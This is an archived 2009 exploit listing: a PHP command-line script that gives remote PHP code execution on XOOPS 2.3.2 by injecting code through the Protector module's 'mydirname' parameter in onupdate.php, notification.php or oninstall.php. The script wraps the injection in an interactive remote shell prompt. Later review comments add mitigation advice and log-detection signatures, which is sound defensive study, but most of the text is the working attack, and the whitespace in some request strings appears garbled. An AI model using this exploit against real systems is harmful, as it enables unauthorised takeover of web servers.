
xoops232-exec.txt

Posted on 08 January 2009

#!/usr/bin/php -q
<?php
/****************************************************************
 * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    *
 * by athos - staker[at]hotmail[dot]it                          *
 * http://xoops.org                                             *
 *                                                              *
 * thanks to s3rg3770 and The:Paradox                           *
 *                                                              *
 * works with register globals on                               *
 * note: this vuln is a remote php code execution               *
 *                                                              *
 * Directory (xoops_lib/modules/protector/)                     *
 * onupdate.php?mydirname=a(){} [PHP CODE] function v           *
 * oninstall.php?mydirname=a(){} [PHP CODE] function v          *
 * notification.php?mydirname=a(){} [PHP CODE] function v       *
 ****************************************************************/

/*
 * Review notes (defensive reading of this listing)
 *
 * - Affected surface, per the author's header: three scripts of the Protector
 *   module under xoops_lib/modules/protector/ that take a request-supplied
 *   `mydirname` value. The author states the issue needs register_globals on.
 * - The value shape in the header ("a(){} ... function v") suggests `mydirname`
 *   ends up inside a dynamically evaluated function definition. The vulnerable
 *   code is not on this page, so treat that as an inference to confirm.
 * - Mitigation: keep register_globals disabled (the directive was removed in
 *   PHP 5.4), keep xoops_lib outside the web root or deny direct HTTP access to
 *   it, and run a XOOPS/Protector release that validates `mydirname`. The page
 *   names no fixed version.
 * - Detection: access-log entries for onupdate.php, oninstall.php or
 *   notification.php in the protector directory that carry a `mydirname` query
 *   parameter, especially one containing parentheses or braces. The hard-coded
 *   User-Agent below is only a weak secondary indicator.
 * - String literals are kept exactly as they appear on this page; their
 *   whitespace looks altered by the page capture.
 */

// Silences every PHP diagnostic for the rest of the run; this also hides the
// undefined-variable notices from the `.=` appends further down.
error_reporting(0);

// Positional CLI arguments: script name, target host, base path, and a number
// that data_exec() maps to one of the three Protector scripts.
list($cli,$host,$path,$num) = $argv;

// Print the banner and stop unless exactly three arguments follow the script name.
if ($argc != 4) {
    print " +--------------------------------------------------------------+ ";
    print " | XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit | ";
    print " +--------------------------------------------------------------+ ";
    print " by athos - staker[at]hotmail[dot]it / http://xoops.org ";
    print " Usage: php xpl.php [host] [path] ";
    print " host + localhost ";
    print " path + /XOOPS ";
    exit;
}

exploit();

/**
 * Entry point: rejects a selector above 3, otherwise starts the prompt loop.
 *
 * Reads the global $num. Only the upper bound is checked here.
 */
function exploit() {
    global $num;
    if ($num > 3) {
        die(" $num isn't a valid option ");
    } else {
        yeat_shell();
    }
}

/**
 * Interactive loop: reads one line from STDIN per iteration, handles the local
 * exit/help/about keywords, then passes the line to data_exec() and prints
 * whatever comes back.
 *
 * The loop only ends through die(); the help and about keywords print their
 * text and the line is still forwarded to data_exec().
 */
function yeat_shell() {
    while (1) {
        echo "yeat[php-shell]~$: ";
        // Input is trimmed and has backslashes stripped before any matching.
        $exec = stripslashes(trim(fgets(STDIN)));
        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die(" Exited ");
        if (preg_match('/^(help|--help)$/i',$exec)) echo(" Example: uname -a ");
        if (preg_match('/^(about|--about)$/i',$exec)) echo(" staker[at]hotmail[dot]it ");
        print data_exec($exec);
    }
}

/**
 * Builds one HTTP GET request for the selected Protector script and returns the
 * raw response obtained through data_send().
 *
 * Reads the globals $host, $path and $num. The URL-encoded input is appended
 * directly after the `mydirname=a(){}` prefix and followed by `function%20v`,
 * which is the request signature a defender can match in access logs.
 *
 * @param string $exec line typed at the prompt
 * @return string raw response text as returned by data_send()
 */
function data_exec($exec) {
    global $host,$path,$num;
    // $num picks the request path; no branch assigns $urlex for other values.
    if ($num == 1) {
        $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
    }
    if ($num == 2) {
        $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
    }
    if ($num == 3) {
        $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
    }
    $exec = urlencode($exec);
    // $data is appended to without being initialised first.
    // The first literal spans two lines on the page and is kept as found.
    $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1 
";
    $data .= "Host: {$host} ";
    // Fixed client string: usable as a log indicator, but trivially changed.
    $data .= "User-Agent: Lynx (textmode) ";
    $data .= "Connection: close ";
    $html = data_send ($host,$data);
    return $html;
}

/**
 * Opens a TCP connection to port 80 of $host, writes $data, and reads the
 * response until end of stream.
 *
 * Terminates the script through die() when the connection cannot be opened;
 * the `@` hides the fsockopen() warning in that case.
 *
 * @param string $host target host name or address
 * @param string $data request text to send
 * @return string everything read from the socket
 */
function data_send ($host,$data) {
    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused,try again! ");
    }
    fputs($sock,$data);
    // $html is appended to without being initialised first.
    while (!feof($sock)) {
        $html .= fgets($sock);
    }
    fclose($sock);
    return $html;
}

 
